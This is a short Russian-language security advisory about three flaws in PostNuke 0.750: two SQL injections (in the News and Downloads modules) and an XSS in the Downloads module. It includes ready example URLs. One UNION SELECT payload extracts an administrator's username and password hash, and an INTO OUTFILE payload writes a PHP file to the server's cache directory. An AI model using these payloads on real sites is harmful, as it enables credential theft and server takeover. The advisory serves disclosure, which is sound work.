Программа: PostNuke 0.750

Уязвимость позволяет злоумышленнику
выполнить произвольные SQL команды в базе
данных приложения, загрузить и выполнить
произвольные файлы и произвести XSS
нападение.

1. Уязвимость в функции getArticles() сценария
modules/News/funcs.php существует из-за некорректной
обработки данных в параметре catid и
позволяет злоумышленнику произвести SQL-инъекцию.

Пример:

http://[HOST]/[DIR]/modules.php?op=modload&name=NS-Polls&
file=index&req=results&pollID=2&mode=thread&order=0&thold= 0&catid=-99999%20UNION%20SELECT%20pn_uname,pn_uname,
pn_uname,pn_uname,pn_uname,null,null,null,pn_uname,pn_uname,
pn_uname,pn_uname,pn_uname,null,pn_pass,null,null,null,null,null,
null%20FROM%20[$PREFIX]users%20WHERE%20pn_uid=2/*2.

Уязвимость обнаружена в функции search()
сценария modules/Downloads/dl-search.php. Удаленный
пользователь может произвести SQL-инъекцию.

http://[HOST]/[DIR]/index.php?name=Downloads &req=search&query=[Program
name]&show=10%20INTO%20OUTFILE%20’/ [PATH]/pnTemp/Xanthia_cache/cXIb8O3.php’/*

3. Межсайтовый скриптинг существует из-за
некорректно обработки входных данных в
модуле Download. Удаленный пользователь может с
помощью специально сформированного URL
выполнить произвольный HTML сценарий в
браузере жертвы.



Оставить мнение